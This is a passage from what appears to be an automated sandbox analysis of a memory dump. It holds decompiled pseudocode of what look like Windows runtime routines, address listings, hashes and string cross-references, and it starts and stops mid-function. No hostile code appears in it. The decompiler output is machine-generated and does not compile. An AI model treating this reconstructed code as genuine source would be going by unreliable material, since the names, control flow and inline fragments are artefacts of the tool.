						_v8 = 0xfffffffe;
						_t253 = _t336;
					}
					L70:
					return E01A3D0D1(_t253);
				}
				L108:
			}

0x01a12584
0x01a12586
0x01a12590
0x01a12596
0x01a12597
0x01a12598
0x01a12599
0x01a1259e
0x01a125a4
0x01a125a9
0x01a125ac
0x01a125ae
0x01a125b1
0x01a125b2
0x01a125b5
0x01a125b8
0x01a125bb
0x01a125bc
0x01a125bf
0x01a125c2
0x01a125c5
0x01a125c6
0x01a125cb
0x01a125ce
0x01a125d8
0x01a125dd
0x01a125de
0x01a125e1
0x01a125e3
0x01a125e9
0x01a126da
0x01a126da
0x01a126dd
0x01a126e2
0x01a55b56
0x00000000
0x01a126e8
0x01a126f9
0x01a126fb
0x01a126fe
0x01a12700
0x01a55b60
0x00000000
0x01a12706
0x01a12706
0x01a1270a
0x01a1270a
0x01a1270d
0x01a12713
0x01a12716
0x01a12718
0x01a1271c
0x01a1271e
0x01a55b6c
0x01a55b6f
0x01a55b7f
0x01a55b89
0x01a55b8e
0x01a55b93
0x01a55b96
0x01a55b9c
0x01a55ba0
0x01a55ba3
0x01a55bab
0x01a55bb0
0x01a55bb3
0x01a55bb3
0x01a55ba3
0x01a12724
0x01a12726
0x01a12729
0x01a1272c
0x01a1279d
0x01a1279d
0x01a127a0
0x01a127a2
0x00000000
0x01a1272e
0x01a1272e
0x01a12731
0x01a12734
0x01a12734
0x01a12736
0x01a55bc1
0x01a55bc1
0x01a55bc4
0x00000000
0x01a55bca
0x01a55bca
0x01a55bcd
0x00000000
0x01a55bd3
0x00000000
0x01a55bd3
0x01a55bcd
0x01a1273c
0x01a1273c
0x01a12742
0x01a12747
0x01a1274a
0x01a1274d
0x01a12750
0x00000000
0x01a12756
0x01a12756
0x00000000
0x01a12902
0x01a12908
0x01a1290b
0x00000000
0x01a12911
0x01a1291c
0x01a12921
0x00000000
0x01a12921
0x00000000
0x00000000
0x01a12880
0x01a12887
0x01a1288c
0x00000000
0x00000000
0x01a12805
0x01a1280a
0x01a12814
0x01a12816
0x00000000
0x00000000
0x01a1281e
0x01a12821
0x01a12823
0x00000000
0x01a12829
0x01a12829
0x01a12831
0x01a1283c
0x01a1283e
0x00000000
0x01a1283e
0x00000000
0x00000000
0x01a1284e
0x01a12850
0x01a12851
0x01a12854
0x01a12857
0x01a1285a
0x01a1285c
0x01a1285d
0x00000000
0x00000000
0x01a1275d
0x01a12761
0x00000000
0x01a12767
0x01a1276e
0x01a12773
0x01a12773
0x01a12776
0x01a12778
0x01a1277e
0x01a1277e
0x01a12781
0x01a12781
0x01a12783
0x01a12784
0x00000000
0x00000000
0x01a55bd8
0x01a55bde
0x01a55be4
0x01a55be6
0x01a55be8
0x01a55be9
0x01a55bee
0x01a55bf8
0x01a55bff
0x01a55c01
0x01a55c04
0x01a55c07
0x01a55c0b
0x01a55c0d
0x01a55c0d
0x01a55c15
0x01a55c18
0x01a55c1b
0x01a55c1b
0x01a55c1e
0x00000000
0x00000000
0x01a128c3
0x01a128c8
0x01a128d2
0x01a128d4
0x01a128d8
0x01a128db
0x01a55c26
0x01a55c28
0x01a55c2d
0x01a55c2d
0x00000000
0x00000000
0x01a55c34
0x01a55c36
0x01a55c49
0x01a55c4e
0x01a55c54
0x01a55c5b
0x01a55c5d
0x01a55c60
0x01a12788
0x01a12788
0x01a1278b
0x01a1278e
0x01a1278e
0x01a1278e
0x01a12791
0x00000000
0x00000000
0x01a12756
0x01a12750
0x00000000
0x01a12794
0x01a12794
0x01a12795
0x01a12798
0x01a12798
0x00000000
0x01a12734
0x01a1272c
0x01a12700
0x01a125ef
0x01a125ef
0x01a125ef
0x01a125f2
0x01a125f8
0x00000000
0x00000000
0x01a125fe
0x00000000
0x01a128e6
0x01a128ec
0x01a128ef
0x01a128f5
0x01a128f8
0x01a128f8
0x00000000
0x01a128f8
0x00000000
0x00000000
0x01a12866
0x01a12866
0x01a12876
0x01a12879
0x00000000
0x00000000
0x01a127e0
0x01a127e7
0x01a127e9
0x01a127eb
0x01a55afd
0x00000000
0x01a55afd
0x00000000
0x00000000
0x01a12633
0x01a12638
0x01a1263b
0x01a1263c
0x01a1263e
0x01a12640
0x01a12642
0x01a12647
0x01a12649
0x01a1264e
0x01a12650
0x01a12653
0x01a12659
0x01a126a2
0x01a126a7
0x01a126ac
0x01a126b2
0x01a55b11
0x01a55b15
0x01a55b17
0x00000000
0x01a126b8
0x01a126b8
0x01a126ba
0x01a127a6
0x01a127a6
0x01a127a9
0x01a127ab
0x01a127b9
0x01a127b9
0x01a127be
0x01a127c1
0x01a127c3
0x01a127c5
0x01a127c7
0x01a55c74
0x01a55c79
0x01a55c79
0x01a127c7
0x00000000
0x01a126c0
0x01a126c0
0x01a126c3
0x01a126c6
0x01a126c6
0x01a126c9
0x01a126c9
0x00000000
0x01a126c9
0x01a126ba
0x01a1265b
0x01a1265b
0x01a1265e
0x01a12667
0x01a1266d
0x01a12677
0x01a1267c
0x01a1267f
0x01a12681
0x01a55b49
0x01a55b4e
0x01a127cd
0x01a127d0
0x01a127d1
0x01a127d2
0x01a127d4
0x01a127dd
0x01a12687
0x01a12687
0x01a1268a
0x01a1268b
0x01a1268e
0x01a1268f
0x01a12691
0x01a12696
0x01a12698
0x01a1269d
0x01a1269f
0x00000000
0x01a1269f
0x01a12681
0x00000000
0x00000000
0x01a12846
0x00000000
0x00000000
0x01a12605
0x01a1260a
0x01a1260c
0x01a12611
0x01a12616
0x01a12619
0x01a12619
0x01a1261e
0x00000000
0x01a12624
0x01a12627
0x01a12627
0x00000000
0x00000000
0x01a55b1f
0x00000000
0x00000000
0x01a12894
0x01a1289b
0x01a1289d
0x01a128a1
0x01a55b2b
0x01a55b2e
0x01a55b2e
0x01a128a7
0x01a128a9
0x01a55b04
0x01a55b09
0x01a55b09
0x01a55b09
0x00000000
0x00000000
0x01a55b35
0x01a55b3c
0x01a128fb
0x01a128fb
0x01a126cc
0x01a126cc
0x01a126d0
0x00000000
0x01a126d2
0x01a126d2
0x00000000
0x01a126d2
0x00000000
0x00000000
0x01a125fe
0x01a1292d
0x01a1292f
0x01a12930
0x01a12935
0x01a1293e
0x01a12944
0x01a12947
0x01a1294c
0x01a1294e
0x01a1294f
0x01a12950
0x01a12957
0x01a12958
0x01a1295a
0x01a12960
0x01a12962
0x01a12968
0x01a12972
0x01a12973
0x01a12974
0x01a1297b
0x01a1297c
0x01a1297e
0x01a1297f
0x01a12980
0x01a12981
0x01a12982
0x01a12983
0x01a12984
0x01a12985
0x01a12986
0x01a12987
0x01a12988
0x01a12989
0x01a1298a
0x01a1298b
0x01a1298c
0x01a1298d
0x01a1298e
0x01a1298f
0x01a12990
0x01a12992
0x01a12997
0x01a129a3
0x01a129a6
0x01a129ab
0x01a129ad
0x01a129b0
0x01a129b2
0x01a55c80
0x01a129b8
0x01a129b8
0x01a129bb
0x01a129c0
0x01a129c5
0x01a129c6
0x01a129c6
0x01a129c9
0x01a129cb
0x00000000
0x00000000
0x01a129cd
0x01a129d0
0x01a129d9
0x01a129db
0x01a129dd
0x01a12a7f
0x01a12a84
0x01a12a87
0x01a12a89
0x01a55ca1
0x01a55ca3
0x00000000
0x01a12a8f
0x01a12a8f
0x00000000
0x01a12a8f
0x00000000
0x01a129e3
0x01a129e3
0x01a129e3
0x00000000
0x01a129e3
0x01a129dd
0x00000000
0x01a129db
0x01a129e6
0x01a129e9
0x01a129eb
0x01a129ed
0x01a129f3
0x01a129f5
0x01a129f8
0x01a129fa
0x01a12a97
0x01a12a9a
0x01a12a9d
0x01a12add
0x00000000
0x01a12a9f
0x01a12aa2
0x01a12aa5
0x01a12aa8
0x01a12aab
0x01a55cab
0x01a55caf
0x01a55cc5
0x01a55cda
0x01a55cdc
0x01a55cdf
0x01a55ce5
0x00000000
0x01a55ceb
0x01a55ced
0x01a55cee
0x00000000
0x01a55cee
0x01a55cb1
0x01a55cb4
0x01a55cb9
0x01a55cbb
0x00000000
0x01a55cbd
0x01a55cbd
0x00000000
0x01a55cbd
0x01a55cbb
0x01a12ab1
0x01a12ab1
0x01a12ac4
0x01a12ac6
0x01a12ac6
0x00000000
0x01a12ac6
0x01a12aab
0x00000000
0x01a12a00
0x01a12a09
0x01a12a0e
0x01a12a21
0x01a12a24
0x01a12a35
0x01a12a3a
0x01a12a3d
0x01a12a42
0x01a12a59
0x01a12a59
0x01a12a5c
0x01a12a5f
0x01a12a5f
0x01a129fa
0x01a129f3
0x01a12a64
0x01a12a64
0x01a12a6b
0x01a12a6b
0x01a12a6d
0x01a12a72
0x01a12a72
0x00000000

Strings

PATH, xrefs: 01A12642, 01A12691

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 7a95465fff7c3bb76b170e19597d73847bab2e1bec8bc837f84d63f3f7308ef6
Instruction ID: b78b740137453eabe9d6c50eee9cb21a05efce913c3cc5e7d894a26d038c70b7
Opcode Fuzzy Hash: 7a95465fff7c3bb76b170e19597d73847bab2e1bec8bc837f84d63f3f7308ef6
Instruction Fuzzy Hash: 65C1B2B5D00219DFDB25DF99D980BAEBBB1FF48740F18402AE911EB294E734E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01A1FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01A1FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E019FEEF0(0x1ad7b60);
					_t134 =  *0x1ad7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1ad7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1ad7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E019F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E019F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01A88938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E019EB150();
													}
													_t116 = E01A86D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E019F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1ad8638; // 0x0
																	_t122 = L019F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E019F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E019F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L01A1FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L019F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E01A1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E01A1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E01A1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E01A1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E01A1FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1ad7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1ad7b84 = _t75;
						_t73 = E019FEB70(_t134, 0x1ad7b60);
						if( *0x1ad7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E019FFF60( *0x1ad7b20);
							}
						}
						goto L5;
					}
				}
			}

0x01a1fab0
0x01a1fab2
0x01a1fab3
0x01a1fab4
0x01a1fabc
0x01a1fac0
0x01a1fb14
0x01a1fb17
0x01a1fac2
0x01a1fac8
0x01a1facd
0x01a1fad3
0x01a1fad3
0x01a1fadd
0x01a1fb18
0x01a1fb1b
0x01a1fb1d
0x01a1fb1e
0x01a1fb1f
0x01a1fb20
0x01a1fb21
0x01a1fb22
0x01a1fb23
0x01a1fb24
0x01a1fb25
0x01a1fb26
0x01a1fb27
0x01a1fb28
0x01a1fb29
0x01a1fb2a
0x01a1fb2b
0x01a1fb2c
0x01a1fb2d
0x01a1fb2e
0x01a1fb2f
0x01a1fb3a
0x01a1fb3b
0x01a1fb3e
0x01a1fb41
0x01a1fb44
0x01a1fb47
0x01a1fb4a
0x01a1fb4d
0x01a1fb53
0x01a5bdcb
0x01a5bdcb
0x01a1fb59
0x01a1fb5b
0x01a1fb5b
0x01a1fb5e
0x01a5bdd5
0x01a5bdd8
0x00000000
0x01a5bdda
0x00000000
0x01a5bdda
0x01a1fb64
0x01a1fb64
0x01a1fb64
0x01a1fb67
0x01a1fb6e
0x01a1fb70
0x01a1fb72
0x00000000
0x01a1fb78
0x01a1fb7a
0x01a1fb7a
0x01a1fb7d
0x01a1fb80
0x01a5bddf
0x01a5bde1
0x00000000
0x01a5bde3
0x00000000
0x01a5bde3
0x01a1fb86
0x01a1fb86
0x01a1fb86
0x01a1fb8b
0x01a1fb90
0x01a1fb92
0x01a1fb94
0x01a1fb9a
0x01a1fb9b
0x01a1fba1
0x01a5bde8
0x01a5bdeb
0x01a5bded
0x01a5beb5
0x01a5beb5
0x01a5bebb
0x01a5bebd
0x01a5bec3
0x01a5bed2
0x01a5bedd
0x01a5bedd
0x01a5beed
0x00000000
0x01a5bdf3
0x01a5bdfe
0x01a5be06
0x01a5be0b
0x01a5be0d
0x01a5be0f
0x01a5be14
0x01a5be19
0x01a5be20
0x01a5be25
0x01a5be27
0x01a5be35
0x01a5be39
0x01a5be46
0x01a5be4f
0x01a5be54
0x01a5be56
0x01a5bef8
0x01a5bef8
0x00000000
0x01a5be5c
0x01a5be5c
0x01a5be60
0x00000000
0x01a5be66
0x01a5be66
0x01a5be7f
0x01a5be84
0x01a5be87
0x01a5be89
0x01a5be8b
0x01a5be99
0x01a5be9d
0x01a5bea0
0x01a5beac
0x01a5beaf
0x01a5beb1
0x01a5beb3
0x01a5beb3
0x00000000
0x01a5bea2
0x01a5bea2
0x00000000
0x01a5bea2
0x01a5be8d
0x01a5be8d
0x01a5be92
0x00000000
0x01a5be92
0x01a5be8b
0x01a5be60
0x01a5be3b
0x01a5be3b
0x01a5be3e
0x00000000
0x01a5be40
0x01a5be40
0x01a5be44
0x00000000
0x00000000
0x00000000
0x00000000
0x01a5be44
0x01a5be3e
0x01a5be29
0x01a5be29
0x00000000
0x01a5be29
0x01a5be27
0x00000000
0x01a1fba7
0x01a1fba7
0x01a1fbab
0x01a5bf02
0x01a1fbb1
0x01a1fbb1
0x01a1fbb8
0x01a1fbbd
0x01a1fbbd
0x01a1fbbf
0x01a1fbbf
0x01a1fbc5
0x01a1fbcb
0x01a1fbf8
0x01a1fbf8
0x01a1fbfa
0x00000000
0x01a1fc00
0x01a1fc00
0x01a1fc03
0x00000000
0x01a1fc09
0x01a1fc09
0x01a1fc0f
0x01a1fc15
0x01a1fc23
0x01a1fc23
0x01a1fc25
0x01a1fc27
0x01a1fc75
0x01a1fc7c
0x01a1fc84
0x00000000
0x01a1fc29
0x01a1fc29
0x01a1fc2d
0x01a1fc30
0x01a5bf0f
0x00000000
0x01a1fc36
0x01a1fc38
0x01a1fc3b
0x01a1fc41
0x01a5bf17
0x01a5bf19
0x01a5bf48
0x01a5bf4b
0x00000000
0x01a5bf1b
0x01a5bf22
0x01a5bf24
0x01a5bf26
0x00000000
0x01a5bf2c
0x01a5bf37
0x01a5bf39
0x01a5bf3b
0x00000000
0x01a5bf41
0x01a5bf41
0x01a5bf41
0x01a5bf41
0x01a5bf45
0x00000000
0x01a5bf45
0x01a5bf3b
0x01a5bf26
0x00000000
0x01a1fc47
0x01a1fc47
0x01a1fc49
0x01a1fcb2
0x01a1fcb4
0x01a1fcb6
0x01a1fcdc
0x01a1fcdc
0x00000000
0x01a1fcb8
0x01a1fcc3
0x01a1fcc5
0x01a1fcc7
0x00000000
0x01a1fcc9
0x01a1fcc9
0x01a1fccd
0x00000000
0x01a1fccd
0x01a1fcc7
0x00000000
0x01a1fc4b
0x01a1fc4b
0x01a1fc4e
0x01a1fc4e
0x01a1fc51
0x01a1fc51
0x01a1fc54
0x01a1fc5a
0x01a1fc5c
0x01a1fc5f
0x01a1fc61
0x01a1fc63
0x01a1fc65
0x01a1fc67
0x01a1fc6e
0x01a1fc72
0x01a1fc72
0x01a1fc72
0x01a1fc72
0x01a1fc67
0x01a1fc61
0x00000000
0x01a1fc5a
0x01a1fc49
0x01a1fc41
0x01a1fc30
0x01a1fc27
0x01a1fc03
0x01a1fbcd
0x01a1fbd3
0x01a1fbd9
0x01a1fbdc
0x01a1fbde
0x01a1fc99
0x01a1fc9b
0x01a1fc9d
0x01a1fcd5
0x01a1fcd5
0x01a1fc89
0x01a1fc89
0x00000000
0x01a1fc9f
0x01a1fc9f
0x01a1fca3
0x00000000
0x01a1fca3
0x00000000
0x01a1fbe4
0x01a1fbe4
0x01a1fbe4
0x01a1fbe4
0x01a1fbe9
0x01a1fbf2
0x00000000
0x01a1fbf2
0x01a1fbde
0x01a1fbcb
0x01a1fbab
0x01a1fc8b
0x01a1fc8b
0x01a1fc8c
0x01a1fb80
0x01a1fb72
0x01a1fb5e
0x01a1fc8d
0x01a1fc91
0x01a1fadf
0x01a1fadf
0x01a1fae1
0x01a1fae4
0x01a1fae7
0x01a1faec
0x01a1faf8
0x01a1fb00
0x01a1fb07
0x01a1fb0f
0x01a1fb0f
0x01a1fb07
0x00000000
0x01a1faf8
0x01a1fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01A5BE0F

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: e495c490cade44bfefa8e47db028215baa7d0dd4bd8a50a4d5ce3411add02134
Instruction ID: d9ab174e085ebe7263b5302ee3b1a05f928a7b369e53f1085636f2c40207e749
Opcode Fuzzy Hash: e495c490cade44bfefa8e47db028215baa7d0dd4bd8a50a4d5ce3411add02134
Instruction Fuzzy Hash: 1DA15571B04A868FEB65CF68C450BBAB7B5BF48711F08452DEE06CB284DB30D809DB90

Uniqueness

Uniqueness Score: -1.00%

Function 019E2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E019E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1ad5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1ad7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E01A297C0();
				}
				if( *0x1ad79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1ad79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01A11624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01A07D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E01A7FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01A29520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E01A1E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L01A3DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1ad6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1ad6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01A29980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E01A295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01A07D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01A07D50();
											__eflags = _t78;
											if(_t78 == 0) {
